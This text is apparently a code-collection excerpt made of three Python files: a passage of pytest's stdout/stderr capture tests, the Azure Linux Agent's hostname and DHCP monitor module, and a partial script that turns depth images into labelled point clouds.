setup and teardown."""
testdir.makepyfile(
"""\
import sys
import pytest
@pytest.fixture
def captured_print({fixture}):
print('stdout contents begin')
print('stderr contents begin', file=sys.stderr)
out, err = {fixture}.readouterr()
yield out, err
print('stdout contents end')
print('stderr contents end', file=sys.stderr)
out, err = {fixture}.readouterr()
assert out == 'stdout contents end\\n'
assert err == 'stderr contents end\\n'
def test_captured_print(captured_print):
out, err = captured_print
assert out == 'stdout contents begin\\n'
assert err == 'stderr contents begin\\n'
""".format(
fixture=fixture
)
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(["*1 passed*"])
result.stdout.no_fnmatch_line("*stdout contents begin*")
result.stdout.no_fnmatch_line("*stderr contents begin*")
@pytest.mark.parametrize("cap", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures_teardown(self, testdir, cap):
"""Ensure we can access setup and teardown buffers from teardown when using capsys/capfd (##3033)"""
testdir.makepyfile(
"""\
import sys
import pytest
import os
@pytest.fixture()
def fix({cap}):
print("setup out")
sys.stderr.write("setup err\\n")
yield
out, err = {cap}.readouterr()
assert out == 'setup out\\ncall out\\n'
assert err == 'setup err\\ncall err\\n'
def test_a(fix):
print("call out")
sys.stderr.write("call err\\n")
""".format(
cap=cap
)
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_setup_failure_does_not_kill_capturing(testdir):
sub1 = testdir.mkpydir("sub1")
sub1.join("conftest.py").write(
textwrap.dedent(
"""\
def pytest_runtest_setup(item):
raise ValueError(42)
"""
)
)
sub1.join("test_mod.py").write("def test_func1(): pass")
result = testdir.runpytest(testdir.tmpdir, "--traceconfig")
result.stdout.fnmatch_lines(["*ValueError(42)*", "*1 error*"])
def test_capture_conftest_runtest_setup(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest()
assert result.ret == 0
result.stdout.no_fnmatch_line("*hello19*")
def test_capture_badoutput_issue412(testdir):
testdir.makepyfile(
"""
import os
def test_func():
omg = bytearray([1,129,1])
os.write(1, omg)
assert 0
"""
)
result = testdir.runpytest("--capture=fd")
result.stdout.fnmatch_lines(
"""
*def test_func*
*assert 0*
*Captured*
*1 failed*
"""
)
def test_capture_early_option_parsing(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest("-vs")
assert result.ret == 0
assert "hello19" in result.stdout.str()
def test_capture_binary_output(testdir):
testdir.makepyfile(
r"""
import pytest
def test_a():
import sys
import subprocess
subprocess.call([sys.executable, __file__])
def test_foo():
import os;os.write(1, b'\xc3')
if __name__ == '__main__':
test_foo()
"""
)
result = testdir.runpytest("--assert=plain")
result.assert_outcomes(passed=2)
def test_error_during_readouterr(testdir):
"""Make sure we suspend capturing if errors occur during readouterr"""
testdir.makepyfile(
pytest_xyz="""
from _pytest.capture import FDCapture
def bad_snap(self):
raise Exception('boom')
assert FDCapture.snap
FDCapture.snap = bad_snap
"""
)
result = testdir.runpytest_subprocess("-p", "pytest_xyz", "--version")
result.stderr.fnmatch_lines(
["*in bad_snap", " raise Exception('boom')", "Exception: boom"]
)
class TestCaptureIO:
def test_text(self):
f = capture.CaptureIO()
f.write("hello")
s = f.getvalue()
assert s == "hello"
f.close()
def test_unicode_and_str_mixture(self):
f = capture.CaptureIO()
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_write_bytes_to_buffer(self):
"""In python3, stdout / stderr are text io wrappers (exposing a buffer
property of the underlying bytestream). See issue #1407
"""
f = capture.CaptureIO()
f.buffer.write(b"foo\r\n")
assert f.getvalue() == "foo\r\n"
class TestTeeCaptureIO(TestCaptureIO):
def test_text(self):
sio = io.StringIO()
f = capture.TeeCaptureIO(sio)
f.write("hello")
s1 = f.getvalue()
assert s1 == "hello"
s2 = sio.getvalue()
assert s2 == s1
f.close()
sio.close()
def test_unicode_and_str_mixture(self):
sio = io.StringIO()
f = capture.TeeCaptureIO(sio)
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_dontreadfrominput():
from _pytest.capture import DontReadFromInput
f = DontReadFromInput()
assert f.buffer is f
assert not f.isatty()
pytest.raises(OSError, f.read)
pytest.raises(OSError, f.readlines)
iter_f = iter(f)
pytest.raises(OSError, next, iter_f)
pytest.raises(UnsupportedOperation, f.fileno)
f.close() # just for completeness
def test_captureresult() -> None:
cr = CaptureResult("out", "err")
assert len(cr) == 2
assert cr.out == "out"
assert cr.err == "err"
out, err = cr
assert out == "out"
assert err == "err"
assert cr[0] == "out"
assert cr[1] == "err"
assert cr == cr
assert cr == CaptureResult("out", "err")
assert cr != CaptureResult("wrong", "err")
assert cr == ("out", "err")
assert cr != ("out", "wrong")
assert hash(cr) == hash(CaptureResult("out", "err"))
assert hash(cr) == hash(("out", "err"))
assert hash(cr) != hash(("out", "wrong"))
assert cr < ("z",)
assert cr < ("z", "b")
assert cr < ("z", "b", "c")
assert cr.count("err") == 1
assert cr.count("wrong") == 0
assert cr.index("err") == 1
with pytest.raises(ValueError):
assert cr.index("wrong") == 0
assert next(iter(cr)) == "out"
assert cr._replace(err="replaced") == ("out", "replaced")
@pytest.fixture
def tmpfile(testdir) -> Generator[BinaryIO, None, None]:
f = testdir.makepyfile("").open("wb+")
yield f
if not f.closed:
f.close()
@contextlib.contextmanager
def lsof_check():
pid = os.getpid()
try:
out = subprocess.check_output(("lsof", "-p", str(pid))).decode()
except (OSError, subprocess.CalledProcessError, UnicodeDecodeError) as exc:
# about UnicodeDecodeError, see note on pytester
pytest.skip(f"could not run 'lsof' ({exc!r})")
yield
out2 = subprocess.check_output(("lsof", "-p", str(pid))).decode()
len1 = len([x for x in out.split("\n") if "REG" in x])
len2 = len([x for x in out2.split("\n") if "REG" in x])
assert len2 < len1 + 3, out2
class TestFDCapture:
def test_simple(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
data = b"hello"
os.write(fd, data)
pytest.raises(AssertionError, cap.snap)
cap.done()
cap = capture.FDCapture(fd)
cap.start()
os.write(fd, data)
s = cap.snap()
cap.done()
assert s == "hello"
def test_simple_many(self, tmpfile):
for i in range(10):
self.test_simple(tmpfile)
def test_simple_many_check_open_files(self, testdir):
with lsof_check():
with testdir.makepyfile("").open("wb+") as tmpfile:
self.test_simple_many(tmpfile)
def test_simple_fail_second_start(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
cap.done()
pytest.raises(AssertionError, cap.start)
def test_stderr(self):
cap = capture.FDCapture(2)
cap.start()
print("hello", file=sys.stderr)
s = cap.snap()
cap.done()
assert s == "hello\n"
def test_stdin(self):
cap = capture.FDCapture(0)
cap.start()
x = os.read(0, 100).strip()
cap.done()
assert x == b""
def test_writeorg(self, tmpfile):
data1, data2 = b"foo", b"bar"
cap = capture.FDCapture(tmpfile.fileno())
cap.start()
tmpfile.write(data1)
tmpfile.flush()
cap.writeorg(data2.decode("ascii"))
scap = cap.snap()
cap.done()
assert scap == data1.decode("ascii")
with open(tmpfile.name, "rb") as stmp_file:
stmp = stmp_file.read()
assert stmp == data2
def test_simple_resume_suspend(self):
with saved_fd(1):
cap = capture.FDCapture(1)
cap.start()
data = b"hello"
os.write(1, data)
sys.stdout.write("whatever")
s = cap.snap()
assert s == "hellowhatever"
cap.suspend()
os.write(1, b"world")
sys.stdout.write("qlwkej")
assert not cap.snap()
cap.resume()
os.write(1, b"but now")
sys.stdout.write(" yes\n")
s = cap.snap()
assert s == "but now yes\n"
cap.suspend()
cap.done()
pytest.raises(AssertionError, cap.suspend)
assert repr(cap) == (
"<FDCapture 1 oldfd={} _state='done' tmpfile={!r}>".format(
cap.targetfd_save, cap.tmpfile
)
)
# Should not crash with missing "_old".
assert repr(cap.syscapture) == (
"<SysCapture stdout _old=<UNSET> _state='done' tmpfile={!r}>".format(
cap.syscapture.tmpfile
)
)
def test_capfd_sys_stdout_mode(self, capfd):
assert "b" not in sys.stdout.mode
@contextlib.contextmanager
def saved_fd(fd):
new_fd = os.dup(fd)
try:
yield
finally:
os.dup2(new_fd, fd)
os.close(new_fd)
class TestStdCapture:
captureclass = staticmethod(StdCapture)
@contextlib.contextmanager
def getcapture(self, **kw):
cap = self.__class__.captureclass(**kw)
cap.start_capturing()
try:
yield cap
finally:
cap.stop_capturing()
def test_capturing_done_simple(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
def test_capturing_reset_simple(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
def test_capturing_readouterr(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
sys.stderr.write("error2")
out, err = cap.readouterr()
assert err == "error2"
def test_capture_results_accessible_by_attribute(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
capture_result = cap.readouterr()
assert capture_result.out == "hello"
assert capture_result.err == "world"
def test_capturing_readouterr_unicode(self):
with self.getcapture() as cap:
print("hxąć")
out, err = cap.readouterr()
assert out == "hxąć\n"
def test_reset_twice_error(self):
with self.getcapture() as cap:
print("hello")
out, err = cap.readouterr()
pytest.raises(ValueError, cap.stop_capturing)
assert out == "hello\n"
assert not err
def test_capturing_modify_sysouterr_in_between(self):
oldout = sys.stdout
olderr = sys.stderr
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
sys.stdout = capture.CaptureIO()
sys.stderr = capture.CaptureIO()
print("not seen")
sys.stderr.write("not seen\n")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
assert sys.stdout == oldout
assert sys.stderr == olderr
def test_capturing_error_recursive(self):
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\n"
assert out2 == "cap2\n"
def test_just_out_capture(self):
with self.getcapture(out=True, err=False) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert not err
def test_just_err_capture(self):
with self.getcapture(out=False, err=True) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert err == "world"
assert not out
def test_stdin_restored(self):
old = sys.stdin
with self.getcapture(in_=True):
newstdin = sys.stdin
assert newstdin != sys.stdin
assert sys.stdin is old
def test_stdin_nulled_by_default(self):
print("XXX this test may well hang instead of crashing")
print("XXX which indicates an error in the underlying capturing")
print("XXX mechanisms")
with self.getcapture():
pytest.raises(OSError, sys.stdin.read)
class TestTeeStdCapture(TestStdCapture):
captureclass = staticmethod(TeeStdCapture)
def test_capturing_error_recursive(self):
r"""For TeeStdCapture since we passthrough stderr/stdout, cap1
should get all output, while cap2 should only get "cap2\n"."""
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\ncap2\n"
assert out2 == "cap2\n"
class TestStdCaptureFD(TestStdCapture):
captureclass = staticmethod(StdCaptureFD)
def test_simple_only_fd(self, testdir):
testdir.makepyfile(
"""\
import os
def test_x():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_x*
*assert 0*
*Captured stdout*
"""
)
def test_intermingling(self):
with self.getcapture() as cap:
os.write(1, b"1")
sys.stdout.write(str(2))
sys.stdout.flush()
os.write(1, b"3")
os.write(2, b"a")
sys.stderr.write("b")
sys.stderr.flush()
os.write(2, b"c")
out, err = cap.readouterr()
assert out == "123"
assert err == "abc"
def test_many(self, capfd):
with lsof_check():
for i in range(10):
cap = StdCaptureFD()
cap.start_capturing()
cap.stop_capturing()
class TestStdCaptureFDinvalidFD:
def test_stdcapture_fd_invalid_fd(self, testdir):
testdir.makepyfile(
"""
import os
from fnmatch import fnmatch
from _pytest import capture
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(
in_=capture.FDCapture(0) if in_ else None,
out=capture.FDCapture(1) if out else None,
err=capture.FDCapture(2) if err else None,
)
def test_stdout():
os.close(1)
cap = StdCaptureFD(out=True, err=False, in_=False)
assert fnmatch(repr(cap.out), "<FDCapture 1 oldfd=* _state='initialized' tmpfile=*>")
cap.start_capturing()
os.write(1, b"stdout")
assert cap.readouterr() == ("stdout", "")
cap.stop_capturing()
def test_stderr():
os.close(2)
cap = StdCaptureFD(out=False, err=True, in_=False)
assert fnmatch(repr(cap.err), "<FDCapture 2 oldfd=* _state='initialized' tmpfile=*>")
cap.start_capturing()
os.write(2, b"stderr")
assert cap.readouterr() == ("", "stderr")
cap.stop_capturing()
def test_stdin():
os.close(0)
cap = StdCaptureFD(out=False, err=False, in_=True)
assert fnmatch(repr(cap.in_), "<FDCapture 0 oldfd=* _state='initialized' tmpfile=*>")
cap.stop_capturing()
"""
)
result = testdir.runpytest_subprocess("--capture=fd")
assert result.ret == 0
assert result.parseoutcomes()["passed"] == 3
def test_fdcapture_invalid_fd_with_fd_reuse(self, testdir):
with saved_fd(1):
os.close(1)
cap = capture.FDCaptureBinary(1)
cap.start()
os.write(1, b"started")
cap.suspend()
os.write(1, b" suspended")
cap.resume()
os.write(1, b" resumed")
assert cap.snap() == b"started resumed"
cap.done()
with pytest.raises(OSError):
os.write(1, b"done")
def test_fdcapture_invalid_fd_without_fd_reuse(self, testdir):
with saved_fd(1), saved_fd(2):
os.close(1)
os.close(2)
cap = capture.FDCaptureBinary(2)
cap.start()
os.write(2, b"started")
cap.suspend()
os.write(2, b" suspended")
cap.resume()
os.write(2, b" resumed")
assert cap.snap() == b"started resumed"
cap.done()
with pytest.raises(OSError):
os.write(2, b"done")
def test_capture_not_started_but_reset():
capsys = StdCapture()
capsys.stop_capturing()
def test_using_capsys_fixture_works_with_sys_stdout_encoding(capsys):
test_text = "test text"
print(test_text.encode(sys.stdout.encoding, "replace"))
(out, err) = capsys.readouterr()
assert out
assert err == ""
def test_capsys_results_accessible_by_attribute(capsys):
sys.stdout.write("spam")
sys.stderr.write("eggs")
capture_result = capsys.readouterr()
assert capture_result.out == "spam"
assert capture_result.err == "eggs"
def test_fdcapture_tmpfile_remains_the_same() -> None:
cap = StdCaptureFD(out=False, err=True)
try:
cap.start_capturing()
capfile = cap.err.tmpfile
cap.readouterr()
finally:
cap.stop_capturing()
capfile2 = cap.err.tmpfile
assert capfile2 == capfile
def test_close_and_capture_again(testdir):
testdir.makepyfile(
"""
import os
def test_close():
os.close(1)
def test_capture_again():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_capture_again*
*assert 0*
*stdout*
*hello*
"""
)
@pytest.mark.parametrize(
"method", ["SysCapture(2)", "SysCapture(2, tee=True)", "FDCapture(2)"]
)
def test_capturing_and_logging_fundamentals(testdir, method: str) -> None:
# here we check a fundamental feature
p = testdir.makepyfile(
"""
import sys, os
import py, logging
from _pytest import capture
cap = capture.MultiCapture(
in_=None,
out=None,
err=capture.%s,
)
cap.start_capturing()
logging.warning("hello1")
outerr = cap.readouterr()
print("suspend, captured %%s" %%(outerr,))
logging.warning("hello2")
cap.pop_outerr_to_orig()
logging.warning("hello3")
outerr = cap.readouterr()
print("suspend2, captured %%s" %% (outerr,))
"""
% (method,)
)
result = testdir.runpython(p)
result.stdout.fnmatch_lines(
"""
suspend, captured*hello1*
suspend2, captured*WARNING:root:hello3*
"""
)
result.stderr.fnmatch_lines(
"""
WARNING:root:hello2
"""
)
assert "atexit" not in result.stderr.str()
def test_error_attribute_issue555(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
assert sys.stdout.errors == "replace"
assert sys.stderr.errors == "replace"
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
@pytest.mark.skipif(
not sys.platform.startswith("win"), reason="only on windows",
)
def test_py36_windowsconsoleio_workaround_non_standard_streams() -> None:
"""
Ensure _py36_windowsconsoleio_workaround function works with objects that
do not implement the full ``io``-based stream protocol, for example execnet channels (#2666).
"""
from _pytest.capture import _py36_windowsconsoleio_workaround
class DummyStream:
def write(self, s):
pass
stream = cast(TextIO, DummyStream())
_py36_windowsconsoleio_workaround(stream)
def test_dontreadfrominput_has_encoding(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
# should not raise AttributeError
assert sys.stdout.encoding
assert sys.stderr.encoding
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_crash_on_closing_tmpfile_py27(testdir):
p = testdir.makepyfile(
"""
import threading
import sys
printing = threading.Event()
def spam():
f = sys.stderr
print('SPAMBEFORE', end='', file=f)
printing.set()
while True:
try:
f.flush()
except (OSError, ValueError):
break
def test_spam_in_thread():
t = threading.Thread(target=spam)
t.daemon = True
t.start()
printing.wait()
"""
)
# Do not consider plugins like hypothesis, which might output to stderr.
testdir.monkeypatch.setenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD", "1")
result = testdir.runpytest_subprocess(str(p))
assert result.ret == 0
assert result.stderr.str() == ""
result.stdout.no_fnmatch_line("*OSError*")
def test_global_capture_with_live_logging(testdir):
# Issue 3819
# capture should work with live cli logging
# Teardown report seems to have the capture for the whole process (setup, capture, teardown)
testdir.makeconftest(
"""
def pytest_runtest_logreport(report):
if "test_global" in report.nodeid:
if report.when == "teardown":
with open("caplog", "w") as f:
f.write(report.caplog)
with open("capstdout", "w") as f:
f.write(report.capstdout)
"""
)
testdir.makepyfile(
"""
import logging
import sys
import pytest
logger = logging.getLogger(__name__)
@pytest.fixture
def fix1():
print("fix setup")
logging.info("fix setup")
yield
logging.info("fix teardown")
print("fix teardown")
def test_global(fix1):
print("begin test")
logging.info("something in test")
print("end test")
"""
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
with open("caplog") as f:
caplog = f.read()
assert "fix setup" in caplog
assert "something in test" in caplog
assert "fix teardown" in caplog
with open("capstdout") as f:
capstdout = f.read()
assert "fix setup" in capstdout
assert "begin test" in capstdout
assert "end test" in capstdout
assert "fix teardown" in capstdout
@pytest.mark.parametrize("capture_fixture", ["capsys", "capfd"])
def test_capture_with_live_logging(testdir, capture_fixture):
# Issue 3819
# capture should work with live cli logging
testdir.makepyfile(
"""
import logging
import sys
logger = logging.getLogger(__name__)
def test_capture({0}):
print("hello")
sys.stderr.write("world\\n")
captured = {0}.readouterr()
assert captured.out == "hello\\n"
assert captured.err == "world\\n"
logging.info("something")
print("next")
logging.info("something")
captured = {0}.readouterr()
assert captured.out == "next\\n"
""".format(
capture_fixture
)
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
def test_typeerror_encodedfile_write(testdir):
"""It should behave the same with and without output capturing (#4861)."""
p = testdir.makepyfile(
"""
def test_fails():
import sys
sys.stdout.write(b"foo")
"""
)
result_without_capture = testdir.runpytest("-s", str(p))
result_with_capture = testdir.runpytest(str(p))
assert result_with_capture.ret == result_without_capture.ret
out = result_with_capture.stdout.str()
assert ("TypeError: write() argument must be str, not bytes" in out) or (
"TypeError: unicode argument expected, got 'bytes'" in out
)
def test_stderr_write_returns_len(capsys):
"""Write on Encoded files, namely captured stderr, should return number of characters written."""
assert sys.stderr.write("Foo") == 3
def test_encodedfile_writelines(tmpfile: BinaryIO) -> None:
ef = capture.EncodedFile(tmpfile, encoding="utf-8")
with pytest.raises(TypeError):
ef.writelines([b"line1", b"line2"]) # type: ignore[list-item]
assert ef.writelines(["line3", "line4"]) is None # type: ignore[func-returns-value]
ef.flush()
tmpfile.seek(0)
assert tmpfile.read() == b"line3line4"
tmpfile.close()
with pytest.raises(ValueError):
ef.read()
def test__get_multicapture() -> None:
assert isinstance(_get_multicapture("no"), MultiCapture)
pytest.raises(ValueError, _get_multicapture, "unknown").match(
r"^unknown capturing method: 'unknown'"
)
def test_logging_while_collecting(testdir):
"""Issue #6240: Calls to logging.xxx() during collection causes all logging calls to be duplicated to stderr"""
p = testdir.makepyfile(
"""\
import logging
logging.warning("during collection")
def test_logging():
logging.warning("during call")
assert False
"""
)
result = testdir.runpytest_subprocess(p)
assert result.ret == ExitCode.TESTS_FAILED
result.stdout.fnmatch_lines(
[
"*test_*.py F*",
"====* FAILURES *====",
"____*____",
"*--- Captured log call*",
"WARNING * during call",
"*1 failed*",
]
)
result.stdout.no_fnmatch_line("*Captured stderr call*")
result.stdout.no_fnmatch_line("*during collection*")
|
env.py
|
# Microsoft Azure Linux Agent
#
# Copyright 2014 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.4+ and Openssl 1.0+
#
import os
import socket
import time
import threading
import azurelinuxagent.common.conf as conf
import azurelinuxagent.common.logger as logger
from azurelinuxagent.common.dhcp import get_dhcp_handler
from azurelinuxagent.common.osutil import get_osutil
def get_env_handler():
return EnvHandler()
class EnvHandler(object):
"""
    Monitor changes to DHCP and hostname.
    If a DHCP client process restart has occurred, reset routes and re-run DHCP with the fabric.
    Monitor SCSI disks.
    If a new SCSI disk is found, set its timeout.
"""
def __init__(self):
self.osutil = get_osutil()
self.dhcp_handler = get_dhcp_handler()
self.stopped = True
self.hostname = None
self.dhcpid = None
self.server_thread = None
self.dhcp_warning_enabled = True
def run(self):
if not self.stopped:
logger.info("Stop existing env monitor service.")
self.stop()
self.stopped = False
logger.info("Start env monitor service.")
self.dhcp_handler.conf_routes()
self.hostname = socket.gethostname()
self.dhcpid = self.osutil.get_dhcp_pid()
self.server_thread = threading.Thread(target = self.monitor)
self.server_thread.setDaemon(True)
self.server_thread.start()
def monitor(self):
"""
        Monitor the DHCP client pid and the hostname.
        If a DHCP client process restart has occurred, reset routes.
"""
while not self.stopped:
self.osutil.remove_rules_files()
timeout = conf.get_root_device_scsi_timeout()
if timeout is not None:
self.osutil.set_scsi_disks_timeout(timeout)
if conf.get_monitor_hostname():
self.handle_hostname_update()
self.handle_dhclient_restart()
time.sleep(5)
def handle_hostname_update(self):
curr_hostname = socket.gethostname()
if curr_hostname != self.hostname:
logger.info("EnvMonitor: Detected host name change: {0} -> {1}",
self.hostname, curr_hostname)
self.osutil.set_hostname(curr_hostname)
self.osutil.publish_hostname(curr_hostname)
self.hostname = curr_hostname
def handle_dhclient_restart(self):
if self.dhcpid is None:
if self.dhcp_warning_enabled:
logger.warn("Dhcp client is not running. ")
self.dhcpid = self.osutil.get_dhcp_pid()
# disable subsequent error logging
self.dhcp_warning_enabled = self.dhcpid is not None
return
        # The DHCP client process hasn't changed since the last check.
if self.osutil.check_pid_alive(self.dhcpid.strip()):
return
newpid = self.osutil.get_dhcp_pid()
if newpid is not None and newpid != self.dhcpid:
logger.info("EnvMonitor: Detected dhcp client restart. "
"Restoring routing table.")
self.dhcp_handler.conf_routes()
self.dhcpid = newpid
def stop(self):
"""
        Stop server communication and join the monitor thread back to the main thread.
"""
self.stopped = True
if self.server_thread is not None:
self.server_thread.join()
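# --- Hypothetical usage sketch, not part of the original module ---
# The agent normally owns this handler's lifecycle; a minimal manual run,
# assuming the azurelinuxagent environment is configured, could look like this.
def _demo_env_handler(run_seconds=30):
    handler = get_env_handler()
    handler.run()             # starts the daemon monitor thread
    time.sleep(run_seconds)   # let it poll a few 5-second cycles
    handler.stop()            # sets the stop flag and joins the thread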
|
IPA_image2pc.py
|
import numpy as np
import cv2
import json
import os
import h5py
from multiprocessing import Process
def perspectiveDepthImageToPointCloud(image_depth,image_rgb, seg, gt_path,defaultValue,perspectiveAngle,clip_start,clip_end,resolutionX,resolutionY,resolution_big,pixelOffset_X_KoSyTopLeft,pixelOffset_Y_KoSyTopLeft):
'''
Input: Depth image in perspective projection
Output: Point cloud as list (in meter)
Parameter:
- image_depth: Depth image in perspective projection with shape (resolutionY,resolutionX,1)
- defaultValue: Default value to indicate missing depth information in the depth image
- perspectiveAngle: Perspective angle in deg
- clip_start: Near clipping plane in meter
- clip_end: Far clipping plane in meter
- resolutionX: resolutionX of the input image
- resolutionY: resolutionY of the input image
- resolution_big: resolution_big of the input image
- pixelOffset_X_KoSyTopLeft: Offset in x direction in pixel from coordinate system top left
- pixelOffset_Y_KoSyTopLeft: Offset in y direction in pixel from coordinate system top left
'''
print('resolutionY,resolutionX',resolutionY,resolutionX)
print('image_depth',image_depth.shape)
assert(image_depth.shape==(resolutionY,resolutionX,1))
# print('resolutionY,resolutionX',resolutionY,resolutionX)
    # Warning: the point cloud will not be correct if the depth image was resized!
image_big=np.zeros((resolution_big,resolution_big))
image_big[pixelOffset_Y_KoSyTopLeft:pixelOffset_Y_KoSyTopLeft+resolutionY,pixelOffset_X_KoSyTopLeft:pixelOffset_X_KoSyTopLeft+resolutionX]=image_depth[:,:,0]
image_depth=image_big
image_depth=np.rot90(image_depth,k=2,axes=(0,1))
# image_rgb = np.rot90(image_rgb, k=2, axes=(0,1))
seg_big=np.zeros((resolution_big,resolution_big))
seg_big[pixelOffset_Y_KoSyTopLeft:pixelOffset_Y_KoSyTopLeft+resolutionY,pixelOffset_X_KoSyTopLeft:pixelOffset_X_KoSyTopLeft+resolutionX]= seg[:,:,0]
seg=seg_big
seg = np.rot90(seg, k=2, axes=(0,1))
print(image_rgb.shape)
point_cloud=[]
transforms = []
range_=clip_end-clip_start
print('gt_path',gt_path)
with open(gt_path,'r',encoding='utf8')as fp:
# json_data = json.load(fp)
gt_info = json.load(fp)
# Loop over all pixels in the depth image:
# print('image_depth.shape',image_depth.shape)
for j in range(image_depth.shape[0]):
for i in range(image_depth.shape[1]):
if image_depth[j,i]==defaultValue or image_depth[j,i]==0:
# print('no depth')
continue
# r = image_rgb[j,i,0]
# g = image_rgb[j,i,1]
# b = image_rgb[j,i,2]
label = seg[j,i]
seg_id = int(label)-1
if label == 255 or label == 0:
continue
world_z=(image_depth[j,i]*range_+clip_start)
# Calculate the orthogonal size based on current depth (function of z value)
orthoSizeZ_x=np.tan(np.deg2rad(perspectiveAngle/2))*world_z*2*resolutionX/resolution_big
orthoSizeZ_y=np.tan(np.deg2rad(perspectiveAngle/2))*world_z*2*resolutionY/resolution_big
meterPerPixel_x=orthoSizeZ_x/resolutionX
meterPerPixel_y=orthoSizeZ_y/resolutionY
world_x=(i+0.5-resolution_big/2)*meterPerPixel_x
world_y=(j+0.5-resolution_big/2)*meterPerPixel_y
# print('seg_id',seg_id)
t = gt_info[seg_id]['t']
t = np.array(t).reshape(-1)
rotation = gt_info[seg_id]['R']
rotation = np.array(rotation).reshape(-1)
# print(rotation)
# rotation = rotation.reshape(-1)
visib = 1.0 - gt_info[seg_id]['occlusion_rate']
# p=[world_x,world_y,world_z,r,g,b,rotation,t,visib,label]
# r = [ _r,for _r in rotation]
# t = [_t, for _t in t]
trans = np.concatenate((rotation,t))
# p=[world_x,world_y,world_z,r,g,b,visib,label]
p=[world_x,world_y,world_z,label]
transforms.append(trans)
point_cloud.append(p)
return point_cloud, transforms
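# --- Hypothetical single-pixel sketch, not part of the original script ---
# Mirrors the unprojection used above: the stored depth is normalised to
# [0, 1] between the clip planes, and the metric size of a pixel grows
# linearly with depth because of the perspective projection.
def _unproject_pixel(i, j, depth_norm, perspectiveAngle, clip_start, clip_end,
                     resolutionX, resolutionY, resolution_big):
    world_z = depth_norm * (clip_end - clip_start) + clip_start
    ortho_x = np.tan(np.deg2rad(perspectiveAngle / 2)) * world_z * 2 * resolutionX / resolution_big
    ortho_y = np.tan(np.deg2rad(perspectiveAngle / 2)) * world_z * 2 * resolutionY / resolution_big
    world_x = (i + 0.5 - resolution_big / 2) * (ortho_x / resolutionX)
    world_y = (j + 0.5 - resolution_big / 2) * (ortho_y / resolutionY)
    return world_x, world_y, world_z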
part_dir = './IPARingScrew_part_1/'
with open(part_dir+'parameter.json', 'r') as f:
parameter = json.load(f)
print(parameter)
cycle_ = parameter['number_cycles']
drop_ = parameter['shapeDropLimit']
defaultValue = -1
perspectiveAngle = parameter['perspectiveAngle']
clip_start = parameter['clip_start']
clip_end = parameter['clip_end']
resolutionX = parameter['resolutionX']
resolutionY = parameter['resolutionY']
resolution_big = parameter['resolution_big']
pixelOffset_X_KoSyTopLeft = parameter['pixelOffset_X_KoSyTopLeft']
pixelOffset_Y_KoSyTopLeft = parameter['pixelOffset_Y_KoSyTopLeft']
NUM_POINT = 4096
data_dtype = 'float32'
label_dtype = 'int32'
def process_data(data_range):
for c in range(data_range[0], data_range[1]):
for d in range(10,drop_+1):
# if os.path.exists('./SileaneBunny/pointcloud/%04d_%03d.txt'%(c,d)):
# continue
depth = cv2.imread(part_dir+"p_depth/cycle_%04d/%03d_depth_uint16.png"%(c,d))
# print('depth',depth.shape)
depth = depth[:,:,0:1]
depth=np.array(depth,dtype='float')
depth /= 255
RGB = cv2.imread(part_dir+"p_rgb/cycle_%04d/%03d_rgb.png"%(c,d),-1)
seg = cv2.imread(part_dir+"p_segmentation/cycle_%04d/%03d_segmentation.png"%(c,d),-1)
            print('seg', seg, seg.shape)
seg = seg.reshape([512,512,-1])
# seg = seg.reshape([474,506,-1])
# seg = seg.reshape([1018,1178,-1])
# defaultValue = 0
# perspectiveAngle = 0
# clip_start = 0
# clip_end = 0
gt_path = part_dir+"gt/cycle_%04d/%03d.json"%(c,d)
